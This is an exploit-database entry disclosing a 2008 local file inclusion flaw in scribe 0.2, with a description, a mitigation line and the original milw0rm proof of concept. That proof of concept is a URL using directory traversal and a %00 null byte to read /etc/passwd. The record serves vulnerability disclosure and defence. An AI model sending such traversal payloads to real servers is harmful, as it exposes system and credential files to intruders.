header-logo
Suggest Exploit
vendor:
scribe
by:
muuratsalo
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: scribe
Affected Version From: 0.2
Affected Version To: 0.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

scribe 0.2 local file inclusion vulnerability

A local file inclusion vulnerability exists in scribe 0.2. An attacker can exploit this vulnerability to include a file from the local host that is outside of the web root directory. This can be exploited by sending a specially crafted HTTP request containing directory traversal sequences and a URL-encoded null byte (%00) to the vulnerable script. This can allow an attacker to view sensitive files on the remote host.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
Source

Exploit-DB raw data:

scribe 0.2 local file inclusion vulnerability

download   http://sourceforge.net/projects/scribe/
author     muuratsalo
contact    muuratsalo[at]gmail.com

exploit 
http://localhost/0.2/index.php?page=../../../../../../../../../../etc/passwd%00

# milw0rm.com [2008-02-14]

Navigation

Suggest Exploit

Services By CQR